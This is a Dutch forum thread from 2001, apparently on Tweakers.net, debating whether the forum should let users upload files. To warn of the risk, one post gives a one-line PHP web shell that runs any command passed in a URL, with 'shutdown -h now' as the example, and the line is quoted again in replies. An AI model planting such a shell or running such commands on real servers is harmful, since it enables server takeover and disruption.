De username van de oorspronkelijke plaatser van deze posting is bij Big Crash 3 eind mei 2001 verloren gegaan. Om toch de posting zelf terug te kunnen plaatsen is de user BC3 Victim in het leven geroepen
Verwijderd
Hmmm... dit zorgt voor een aantal probleemen:Op woensdag 25 april 2001 22:39 schreef GSMboy het volgende:
Zou het niet makkelijk zijn voor de users zonder website dat hun bestanden kunnen uploaden naar GOT? Bijv. een plaatje die in een topic moet ofzo. Want waar moeten de users zonder website hun plaatjes dan neerdumpen?
IDEETJE voor de volgende update?
1. Schijfruimte... Als elke Tweaker 10 meg krijgt zijn we al snel een 100 GB verder.
2. Problemen met warez/MP3''s/etc. Dit ivm problemen met auteursrechten ed.
Al met al niet haalbaar IMO.
Arjen......Tijd om achter je compu te zitten en wat te programmeren......:)
De username van de oorspronkelijke plaatser van deze posting is bij Big Crash 3 eind mei 2001 verloren gegaan. Om toch de posting zelf terug te kunnen plaatsen is de user BC3 Victim in het leven geroepen
Compleet zinloos imho om de T.net servers daarmee te vervuilen.
Grapjas!Arjen......Tijd om achter je compu te zitten en wat te programmeren......
Jaja, en dan een php script uploaden:Op woensdag 25 april 2001 22:46 schreef GSMboy het volgende:
Een grote map met wat schijfruimte ofzo en alleen HTML, PHP, HTMl, JS, enz... worden toegelaten. Behalve MP3. Ook kan er een beveiliging op waarmee elke tweaker maar een bestandje van 100 KB max. kan uploaden ofzo.....
Arjen......Tijd om achter je compu te zitten en wat te programmeren......:)
1
2
3
4
5
| <? php exec($e); ?> |
en dan http://www.tweakers.net/users/26394/index.php?e=''shutdown -h now''
Professioneel Hyves-weigeraar
Dat kon toch alOp woensdag 25 april 2001 22:55 schreef WouterTinus het volgende:
[..]
Jaja, en dan een php script uploaden:
PHP:
1 2 3 4 5 6 7 8 9 10 11 <? php exec($e); ?>
"The shell stopped unexpectedly and Explorer.exe was restarted."
Goh... draaien de webservers hier als root?Op woensdag 25 april 2001 22:55 schreef WouterTinus het volgende:
[..]
Jaja, en dan een php script uploaden:
PHP:
1 2 3 4 5 6 7 <? php exec($e); ?>
Ga maar eens aan de gebruiker [nielsonline] vragen, die heeft het ook in zijn forum.Op donderdag 26 april 2001 07:40 schreef GSMboy het volgende:
Het zou wel makkelijk zijn ja!
Lijkt me niet echt een taak van/voor GoT.
I don't know half of you half as well as I should like; and I like less than half of you half as well as you deserve
Moet je aan Luite vragen, die kan dat vast wel even regelenOp donderdag 26 april 2001 01:01 schreef Onno het volgende:
[..]
Goh... draaien de webservers hier als root?
Professioneel Hyves-weigeraar
Een accountje bij zonnet, freeler, wanadoo, tmfweb, 12move etc is zo gemaakt naast de vele free wepspace sites zoals Xoom, Geocities etc. Alleen die webspace sites hebben tegenwoordig de nare eigenschap dat je plaatjes ed niet kan linken vanuit iets anders....
Als je al niet eens weet hoe je een bestand moet uploaden, wat doe je dan op Gathering of Tweakers?Op donderdag 26 april 2001 16:03 schreef Sinclair het volgende:
Veel mensen weten niet dat ze deze mogelijkheden hebben of weten hoe ze moeten uploaden[...]
(Niet aan jou gericht maar als ontkrachting van je argument
klopt. En me planet webspace doet ook erg raar. De helf van wat ik upload resulteert in een code404 &^$@%#!!. Jpg''tjes trekt-ie zowieso niet. Ik moet ze ff renamen naar *.gif, en dan lukt het wel (ie ziet dan zelf dat het een jpg is). En ook .htm bestanden willen niet uploaden. Ik heb in m''n sig een link naar een html-etje, dat ik gerenamed heb naar een .txt bestand. IE maakt er weer netjes een website van, gelukkig.Op donderdag 26 april 2001 21:47 schreef looskuh het volgende:
EHm, ja , maar je kan sinds kort niet meer uploaden naar bijvoorbeeld zonnet of wanadoo, als je niet bent ingelogd via de desbetreffende provider. En dat zuigt dus big time.
En als je planet een mailtje schrijft daarover, krijg je als antwoord "bel de helpdesk", en daar heb ik nou net geen zin in. Kunnen die lui niet gewoon via de mail een antwoord geven.
4x APsystems DS3; 4x495Wp OZO/WNW 10° ; 4x460Wp OZO/WNW 10°; Totaal 3820Wp
Peugeot 307 1.6 16v '05 | Yamaha XJ900S Diversion '01 & Honda PS150i '07 | | Gravity is a myth, earth sucks.
Nou.... ik ken genoeg mensen die hotmail gebruiken omdat ze niet weten dat naast het inbellen ook een email account aan vast zit of hoe ze een POP3 email moeten instellen in hun outlook of een ander pakketOp donderdag 26 april 2001 22:14 schreef oVRoM het volgende:
[..]
Als je al niet eens weet hoe je een bestand moet uploaden, wat doe je dan op Gathering of Tweakers?
(Niet aan jou gericht maar als ontkrachting van je argument)
Da''s waar ja, had ik laatst nog toen ik topics van case-mods doorlas, geen plaatjes meer, heb je d''r niet echt veel aan.Op vrijdag 27 april 2001 13:06 schreef Chaos het volgende:
Het belangrijke voordeel van een uploadfunctie is dat de files bij de threads blijven. Nu gooien mensen de plaatjes weg zodra ze een antwoord hebben en iemand die vervolgens die thread ''nodig'' heeft snapt er geen bal meer van zonder plaatjes.
Peugeot 307 1.6 16v '05 | Yamaha XJ900S Diversion '01 & Honda PS150i '07 | | Gravity is a myth, earth sucks.